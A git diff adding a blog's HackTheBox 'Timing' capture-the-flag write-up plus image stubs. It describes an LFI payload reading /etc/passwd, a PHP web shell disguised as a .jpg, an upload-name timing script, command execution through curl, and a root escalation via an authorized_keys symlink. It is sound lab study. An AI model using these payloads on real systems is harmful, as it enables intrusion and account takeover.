diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-18.webp b/content/writeup-ctf/writeup-timing-htb/img/image-18.webp
new file mode 100644
index 0000000..3aa8f58
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-18.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:76c1a59f02ecae9d24da819e902447f8bc13362baebf545806c3fd09e1ecb0be
+size 36094
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-19.png b/content/writeup-ctf/writeup-timing-htb/img/image-19.png
new file mode 100644
index 0000000..1f84c28
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-19.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a4dd4e370050a0fb224b9b1031283fa1aae007ff82eb791c1f9eb91df12856a1
+size 48350
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-19.webp b/content/writeup-ctf/writeup-timing-htb/img/image-19.webp
new file mode 100644
index 0000000..adc41e3
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-19.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:71b7f75aca43d539bdee6e38990671d192b81cc647b5374160468b90892234a1
+size 42062
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-2.png b/content/writeup-ctf/writeup-timing-htb/img/image-2.png
new file mode 100644
index 0000000..4395fdf
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fe335ed79874d2a603bb95fc8cad85abe6b8b899e39c4033e00f874d13735bd4
+size 41386
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-2.webp b/content/writeup-ctf/writeup-timing-htb/img/image-2.webp
new file mode 100644
index 0000000..5c27dd4
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6de64fc8cbbd379528f4c0760467b15d1881cc768d512a2f7eb8d1ed97b3d561
+size 10532
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-20.png b/content/writeup-ctf/writeup-timing-htb/img/image-20.png
new file mode 100644
index 0000000..ddedaee
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-20.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5113f34a0a50554ec236f0edfe17572115c3141bfcdd2396421b146ba17ee79d
+size 20198
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-20.webp b/content/writeup-ctf/writeup-timing-htb/img/image-20.webp
new file mode 100644
index 0000000..b271ab2
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-20.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e2547e7fe4481043d9e61c7e97d26b10167ef1e375e74564d97f6d7d698d414e
+size 21110
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-21.png b/content/writeup-ctf/writeup-timing-htb/img/image-21.png
new file mode 100644
index 0000000..f77de4f
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-21.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9be541c5bb6391741e51d205cb2a225e5817469773123925fc58da5bf59db226
+size 54120
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-21.webp b/content/writeup-ctf/writeup-timing-htb/img/image-21.webp
new file mode 100644
index 0000000..99d6a88
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-21.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a382e45ead08775949d921736a4ed1fc47d5a1921ce72284b16b4c81dbdc4925
+size 49984
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-3.png b/content/writeup-ctf/writeup-timing-htb/img/image-3.png
new file mode 100644
index 0000000..dac4ea9
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:809f6a931a1112321e07f72c3bcc9fe49edc452e4027c692fe3fe8ef730fb76e
+size 101325
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-3.webp b/content/writeup-ctf/writeup-timing-htb/img/image-3.webp
new file mode 100644
index 0000000..9e922e1
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2d95726d6bf27a02851764f1b3f5d1fa5441ca35551da9365ef1f127e15afdd7
+size 93320
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-4.png b/content/writeup-ctf/writeup-timing-htb/img/image-4.png
new file mode 100644
index 0000000..16d53ae
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:66774f6abbd98e6a7b678f306e063ee8dc44dc43f2140bd8df69c6fac9666fb0
+size 43474
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-4.webp b/content/writeup-ctf/writeup-timing-htb/img/image-4.webp
new file mode 100644
index 0000000..cac7fab
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:53f21af41de8fede54af9dbf632552695e04305f52f86b1878114c8ef17d319b
+size 35140
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-5.png b/content/writeup-ctf/writeup-timing-htb/img/image-5.png
new file mode 100644
index 0000000..e209f19
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:42b08ccb1d8b64c1a0de213e388c6cc5d51e17b78297fb8154e9f6e5fbbc4fc0
+size 8158
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-5.webp b/content/writeup-ctf/writeup-timing-htb/img/image-5.webp
new file mode 100644
index 0000000..d1bed6f
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ff3177b0fdc858c855efc183499d0d3af20a016462245a723bffed22d08b60b1
+size 7294
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-6.png b/content/writeup-ctf/writeup-timing-htb/img/image-6.png
new file mode 100644
index 0000000..042a061
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:39f82af1221a5f7036651a6612bd42950f6b5c0912a4af73f3da964e7412fe7d
+size 32550
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-6.webp b/content/writeup-ctf/writeup-timing-htb/img/image-6.webp
new file mode 100644
index 0000000..7b30317
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d7bca96a323be3797193ab4380fa92a20df129982c9a23f46aef7c8e06739c6d
+size 34996
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-7.png b/content/writeup-ctf/writeup-timing-htb/img/image-7.png
new file mode 100644
index 0000000..aef1754
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:911e549992d5ab38c8566d70ebfe5efde84de18d372d284f817d1a51020bfaa7
+size 13021
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-7.webp b/content/writeup-ctf/writeup-timing-htb/img/image-7.webp
new file mode 100644
index 0000000..83202ec
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:babc10f58f506c89d01a3f002110c68b611314095ce427edb32076ad9872a87b
+size 18628
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-8.png b/content/writeup-ctf/writeup-timing-htb/img/image-8.png
new file mode 100644
index 0000000..93385da
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b7361ab102345339fe8c72c759407a6a4f6a09c2f15cfecab9ee68b1b97be48e
+size 9986
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-8.webp b/content/writeup-ctf/writeup-timing-htb/img/image-8.webp
new file mode 100644
index 0000000..8042c85
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d0c43d07d065dac385488c8cb3bfb42a110060f5b74e03b88dc306a80cdd1164
+size 8012
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-9.png b/content/writeup-ctf/writeup-timing-htb/img/image-9.png
new file mode 100644
index 0000000..8bfc754
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bfb37da41b615ff14a8382dbf6321cda83c267360a56e8157b7faceedbd5a136
+size 12839
diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-9.webp b/content/writeup-ctf/writeup-timing-htb/img/image-9.webp
new file mode 100644
index 0000000..8203558
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ec998496430dda523329b2f599bf5d9c192137f5697edaa03bbb04f9868e3cb7
+size 21126
diff --git a/content/writeup-ctf/writeup-timing-htb/index.md b/content/writeup-ctf/writeup-timing-htb/index.md
new file mode 100644
index 0000000..4c9647f
--- /dev/null
+++ b/content/writeup-ctf/writeup-timing-htb/index.md
@@ -0,0 +1,300 @@
+---
+title: "Writeup - Timing (HTB)"
+date: 2022-04-07
+slug: "writeup-timing-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Timing](https://app.hackthebox.com/machines/Timing) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.135
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 7.6p1)
+- 80/tcp : HTTP web server (Apache 2.4.49)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First of all, let's start by listing the pages of the website.
+
+![](img/image-3.webp)
+
+When testing the different ones, they all return an error except the `image.php` page. Let's try to list the arguments available on this page with the following command:
+
+
+```bash
+ffuf -c -u http://10.10.11.135/image.php?FUZZ=/bin/bash -w wordlist/common.txt -fw 1
+```
+![](img/image-4.webp)
+
+We find that the `img` argument exists. Let's try to list the contents of the `/etc/passwd` :
+
+![](img/image-5.webp)
+
+The site has an injection detection, let's try to make a new request but this time with a base64 encoding to avoid the detection:
+
+
+```bash
+http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd
+```
+The page returns a character string in base64, I decode it with the following command:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ echo "[string]" | base64 -d
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
+syslog:x:102:106::/home/syslog:/usr/sbin/nologin
+messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
+_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
+lxd:x:105:65534::/var/lib/lxd/:/bin/false
+uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
+dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
+pollinate:x:109:1::/var/cache/pollinate:/bin/false
+sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
+mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
+aaron:x:1000:1000:aaron:/home/aaron:/bin/bash
+```
+We find that there is a user `aaron` on the machine. I try to connect to the site with this user and basic passwords.  I end up connecting with the following credentials: `user: aaron, password: aaron`.
+
+I continue my exploration of the files by starting with `login.php`. 
+
+![](img/image-6.webp)
+
+In this file I find a reference to the database connection file: `db_conn.php`. 
+
+
+```bash
+$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
+```
+db\_conn.phpOk, we have a username and password for the mysql database and potentially a user... I tried to make an SSH session with this password and the user `aaron` but without success.
+
+I continue my research and find the mention of a new page in `upload.php` : `admin_auth_check.php`.
+
+
+```php
+<?php
+
+include_once "auth_check.php";
+
+if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
+    echo "No permission to access this panel!";
+    header('Location: ./index.php');
+    die();
+}
+
+?>
+```
+In this file we find that if the session variable `role` is equal to 1 we have access to the admin section of the site.
+
+In one of the javascript files we find the existence of another php page : `profile_update.php`.
+
+
+```php
+function updateProfile() {
+    var xml = new XMLHttpRequest();
+    xml.onreadystatechange = function () {
+        if (xml.readyState == 4 && xml.status == 200) {
+            document.getElementById("alert-profile-update").style.display = "block"
+        }
+    };
+
+    xml.open("POST", "profile_update.php", true);
+    xml.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
+    xml.send("firstName=" + document.getElementById("firstName").value + "&lastName=" + document.getElementById("lastName").value + "&email=" + document.getElementById("email").value + "&company=" + document.getElementById("company").value);
+}
+```
+![](img/image-7.webp)
+
+In this file we find that we can send during a POST request the `role` variable. I create a request with Burp with `role=1`, this should give me access to the admin panel of the site.
+
+![](img/image-8.webp)
+
+I continue my analysis of the php files of the site with `avatar_uploader.php` which brings me then to `upload.php`.
+
+
+```php
+<?php
+include("admin_auth_check.php");
+
+$upload_dir = "images/uploads/";
+
+if (!file_exists($upload_dir)) {
+    mkdir($upload_dir, 0777, true);
+}
+
+$file_hash = uniqid();
+
+$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
+$target_file = $upload_dir . $file_name;
+$error = "";
+$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));
+
+if (isset($_POST["submit"])) {
+    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
+    if ($check === false) {
+        $error = "Invalid file";
+    }
+}
+
+// Check if file already exists
+if (file_exists($target_file)) {
+    $error = "Sorry, file already exists.";
+}
+
+if ($imageFileType != "jpg") {
+    $error = "This extension is not allowed.";
+}
+
+if (empty($error)) {
+    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
+        echo "The file has been uploaded.";
+    } else {
+        echo "Error: There was an error uploading your file.";
+    }
+} else {
+    echo "Error: " . $error;
+}
+?>
+```
+In this file we learn several things:
+
+- Only `.jpg` files are accepted
+- The uploaded images are stored in the folder `images/uploards/`
+- The images take a name based on the string `$file_hash` and the function time()
+
+💡In PHP single quotes are strings and double quotes are the values of the variable.So we will have to make a script to calculate the first part of the file name. I realize this script in PHP, every second it will give a possible hash to use for the name of the uploaded file.
+
+
+```php
+<?php
+
+while(true) {
+    $hash = md5('$file_hash' . time()) . 'd3vyce.jpg';
+    echo "hash = $hash \n";
+    sleep(1);
+}
+```
+
+{{< alert >}}
+Before doing the manipulation, it is necessary to check that your clock is well synchronized with the Internet (`timedatectl`). If this is not the case, you can activate it with the following command: `timedatectl set-ntp yes`.I create an image `d3vyce.jpg` with the following content:
+{{< /alert >}}
+
+```php
+<?php system($_GET[cmd]);?>
+```
+I then run the php script :
+
+![](img/image-9.webp)
+
+Then I upload the image on the server. All that's left to do is to make requests with the different hash possibilities.
+
+![](img/image-10.webp)
+
+I can now send commands to the target server. It's not ideal, but I also tried with a reverse shell, but without success...
+
+![](img/image-11.webp)
+
+After some time of enumeration, I find a `source-files-backup.zip` file in the `/otp` folder.
+
+To recover this file, I make a copy to the folder where the website is stored:
+
+
+```bash
+curl 'http://10.10.11.135/image.php?img=images/uploads/0fdde4bab214a9a96630c16ac87bf0d4_d3vyce.jpg&cmd=cp+/opt/source-files-backup.zip+/var/www/html/'
+```
+I can now retrieve the file by accessing the address `http://10.10.11.135/source-files-backup.zip`. After unzipping the zip I find the tree structure :
+
+![](img/image-12.webp)
+
+This is a GIT project, so I check the history with the following command:
+
+![](img/image-13.webp)
+
+In the last commit, there was a modification on the file in which we found credencials. Let's see what has been modified in this file:
+
+![](img/image-14.webp)
+
+There has been a password change! Let's try this new password to create an SSH session with the user `aaron`.
+
+![](img/image-15.webp)
+
+I now have a shell and can retrieve the first flag.
+
+## Privilege escalation
+
+For elevation of privilege I first check if the user has sudo access:
+
+![](img/image-16.webp)
+
+So I can use the `netutils` service with root rights. Let's see what this program does:
+
+![](img/image-17.webp)
+
+This program allows you to download files via FTP or HTTP.
+
+![](img/image-18.webp)
+
+Once the file is downloaded, I notice that it does not belong to me but to the root user!
+
+What we will be able to do is to make a symbolic link of the file `/root/.ssh/authorized_keys` and then upload a file with the same name so that the content is overwritten and replaced by our public key.
+
+To do this I create the symbolic link with the following command:
+
+
+```bash
+ln -s /root/.ssh/authorized_keys authorized_keys
+```
+![](img/image-19.webp)
+
+Then before launching a file server in which I placed a file `authorized_keys` with my public key inside.
+
+I download the file with the program `netutils` : 
+
+![](img/image-20.webp)
+
+I now connect to the root user via SSH :
+
+![](img/image-21.webp)
+
+I can now recover the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not use the same login/password
+- Fix the php argument to avoid enumeration
+- Do not use a user's password for the mysql database
+- Do not give sudo rights to a program that does not need them
diff --git a/content/writeup-ctf/writeup-undetected-htb/featured.png b/content/writeup-ctf/writeup-undetected-htb/featured.png
new file mode 100644
index 0000000..d5f8ef6
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:963c8b49c308e3a4a1297e241445d9aaee00bfe2f32c04c253c5db6e1b41f027
+size 256365
diff --git a/content/writeup-ctf/writeup-undetected-htb/featured.webp b/content/writeup-ctf/writeup-undetected-htb/featured.webp
new file mode 100644
index 0000000..51548f9
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bb90f770285d83178892a15333d06dec50497fb7ff360d8c6d14e8f799b4b60f
+size 27888
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-1.png b/content/writeup-ctf/writeup-undetected-htb/img/image-1.png
new file mode 100644
index 0000000..4fd9e88
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f2c89f7864ee1b755081af7b4a2f8fe106f7197cf6d40a22634b45df44e1abda
+size 37947
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp
new file mode 100644
index 0000000..11280e1
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c328baed7dfb5f86667a89115e1bd16b48a7abffe4a8bc10b9b90058a511714d
+size 29180
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-10.png b/content/writeup-ctf/writeup-undetected-htb/img/image-10.png
new file mode 100644
index 0000000..fbc6905
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a8b979d0d2f85f4c32dd0a091121493298d2bb28257aff3b3e275efbbf8127b2
+size 22346
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp
new file mode 100644
index 0000000..945eae3
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:548450b30532e9752b664b1d6209adfbcc801a6ed9ce9cd414d9108cd9cb69bc
+size 26692
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-11.png b/content/writeup-ctf/writeup-undetected-htb/img/image-11.png
new file mode 100644
index 0000000..03db2e7
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6226d76132fb29431c5fdd1f5dfbb163b9fce05354cecd2e302af401f2fbeba9
+size 13513
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp
new file mode 100644
index 0000000..8d1cd87
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c1b9ec7a173c6d3273e35489a980c3c6ec358ee8d4f1c1631779c220b8955760
+size 11912
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-2.png b/content/writeup-ctf/writeup-undetected-htb/img/image-2.png
new file mode 100644
index 0000000..d897dbc
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b93994f5e30ea46d8804ce18490231b82c78de984e92f75170aa3f08a42367f8
+size 707863
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp
new file mode 100644
index 0000000..c1d8d33
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:41a2aaeac7ad2a554f7f515e0a35910f095acb1b11cb9a4672d60b10f05c9029
+size 105252
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-3.png b/content/writeup-ctf/writeup-undetected-htb/img/image-3.png
new file mode 100644
index 0000000..c26d727
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0961533532df1b04d212a67bd8f489be432593fa3344a45994f88a495c1fd1c9
+size 771609
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp
new file mode 100644
index 0000000..ee23a58
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:54b6b7557b35d89a18add7ce3cb5570b2ff50bc216be74f982a6b43cd828a2f9
+size 106284
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-4.png b/content/writeup-ctf/writeup-undetected-htb/img/image-4.png
new file mode 100644
index 0000000..288f6ac
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3535bc6774dd9bf2ca87c615e51580877ccb2ffad2d112e889ab46389fe64beb
+size 75824
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp
new file mode 100644
index 0000000..06f9200
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:609e1804a698b4f0e0dcfaa1f88cf0a469c160d99cf0c9e309c6162a418f3133
+size 49038
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-5.png b/content/writeup-ctf/writeup-undetected-htb/img/image-5.png
new file mode 100644
index 0000000..929c13e
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f987b24c95e5109468a2c61bb1f373658d022955123ecf8ecde3cc1c9ecfd2df
+size 149920
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp
new file mode 100644
index 0000000..594e0bc
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5e586edba87e5e2b5dd87dc73f27a98d551e9685f87eb33fce6cf54df9490eb5
+size 126184
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-6.png b/content/writeup-ctf/writeup-undetected-htb/img/image-6.png
new file mode 100644
index 0000000..aebb481
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a7142b295523f882a236fbb896532359671f34a92d37b2693a36eedfb62e9ade
+size 40215
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp
new file mode 100644
index 0000000..be4bbe3
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9badc803bc9351be412793bdd6d96832ac837fc3f3ea572afac5805d08eea94c
+size 28898
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-7.png b/content/writeup-ctf/writeup-undetected-htb/img/image-7.png
new file mode 100644
index 0000000..36df5f5
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b62c34975df94f96e19b23fb29574a68ff5df6098011afcf3f34f192b6ea115a
+size 55703
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp
new file mode 100644
index 0000000..59643b7
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:50aafb992cad3a47977f76f3d4c6781a5b9777b5d3d7769e7f1442bc5d35f865
+size 37728
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-8.png b/content/writeup-ctf/writeup-undetected-htb/img/image-8.png
new file mode 100644
index 0000000..157c037
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:796988e9b8d51806a19bc8026e7d84b831d8cc82ae1cec6c6b444c95d8db9974
+size 72422
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp
new file mode 100644
index 0000000..79241f6
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:68d4056659c848c8ecbf3d1c1774d47ba09830c2eac377ca0350359175e47f20
+size 51648
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-9.png b/content/writeup-ctf/writeup-undetected-htb/img/image-9.png
new file mode 100644
index 0000000..d9c2a5d
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:808015e3d80a2b00eebaf29e4de90c8eab94ddbdbe1dcefca72898e188bb7fd3
+size 25832
diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp
new file mode 100644
index 0000000..6c6209c
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d82211f286103e07893d119c16e8f36aaf3fb70231ce31db982eb48d3f8e2b6a
+size 22102
diff --git a/content/writeup-ctf/writeup-undetected-htb/index.md b/content/writeup-ctf/writeup-undetected-htb/index.md
new file mode 100644
index 0000000..e443b34
--- /dev/null
+++ b/content/writeup-ctf/writeup-undetected-htb/index.md
